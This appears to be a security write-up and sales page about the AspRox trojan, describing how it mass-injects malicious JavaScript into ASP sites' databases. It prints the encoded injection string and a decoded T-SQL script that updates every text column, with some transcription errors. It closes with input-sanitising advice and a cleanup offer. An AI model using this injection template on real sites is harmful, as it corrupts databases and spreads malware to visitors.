When the AspRox Virus/Trojan first appeared, it took the form of a phishing Trojan, but a recent update pushed to infected computers revealed an entirely new make up for this online Malbot. The bot has been transformed into an unusual form of attackware that is rapidly infecting websites and users.

Once its installed on a users machine the Trojan starts sending AScII encoded http ‘Get’ requests to vulnerable websites written in asp, it uses a backdoor on the users machine to do this. These malicious requests contain an AsCII binary encoded T-SQL script, Similar to that shown below. (string reduced)

;DECLARE @ VARCHAR(4000); SET%20@S=CAST (0 x 4 4 4 5 4 3 4 C 4 1 5 2 4 5 2 0 4 0 5 4 2 0 5 6 4 1 5 2 4 3 4........20 VARCHAR(4000)); EXEC(@S);--

The script attempts to connect to the websites database, where it creates a table cursor to browse through the table columns. It retrieves all info from specific VARCHAR fields in all tables found, it then assigns its own value to the current values (in this case a JavaScript file) and performs an update on the database.

Decoding the injection reveals the hidden T-SQL script.     [subject to variation]

DECLARE @T VARCHAR(255)
DECLARE @C VARCHAR(255)
DECLARE Table_Cursor, CURSOR FOR
SELECT [A].[Name], [B].[Name]
FROM sysobjects AS [A], syscolumns AS [B]
WHERE [A].[ID] = [B].[ID] AND
[A].[XType] = 'U' /* Table (User-Defined) */ AND
([B].[XType] = 99 /* NTEXT */ OR
[B].[XType] = 35 /* TEXT */ OR
[B].[XType] = 231 /* NVARCHAR */ OR
[B].[XType] = 167 /* VARCHAR */)
OPEN Table_Cursor
FETCH NEXT FROM Table_Cursor INTO @T,@C
WHILE (@@FETCH_STATUS = 0)
BEGIN
EXEC('UPDATE [' + @T + '] SET [' + @C + '] =
RTRIM(CONVERT(VARCHAR, [' + @C + '])) + ''''')
FETCH NEXT FROM Table_Cursor INTO @T, @C
END
NEXT
CLOSE Table_Cursor
DEALLOCATE Table_Cursor

The result for those sites affected is the inclusion of the malicious Javascript file in all fields described, this causes any data retrieved on to the websites webpage to run the file on the website users machine. When the JavaScript file is run, a tiny i-frame is created which then attempts to download malicious software from another host website using up-to 9 different browser exploits. Thus the whole cycle starts again, continuing the spread of infection. It has been noted that this particular Trojan can be quite difficult to protect websites against. We have heard many reports of 'well coded' sites suffering from this Trojan.
Write Up By: Baz {FireStorm}

Website Owners
It is imperative that all querystring and form data is checked vigorously and fully cleaned before being executed against the database. All session objects should also be subject to the same checking methods. Simply checking ‘Server Variables’ is not acceptable protection, these can be spoofed. Restricting database rights is important on high use front end web applications, only allow what is absolutely essential.

What Can I Do?
We can offer you a specially designed package to protect your website against attacks by this notoriously difficult to clean Trojan. Our package can usually be installed onto your website and database very quickly offering almost instant protection. We can also repair and rebuild your corrupt database, and have you back up and running in no-time at all. Contact us now for a highly competitive quote. Website solutions to the AspRox Trojan start from £49.99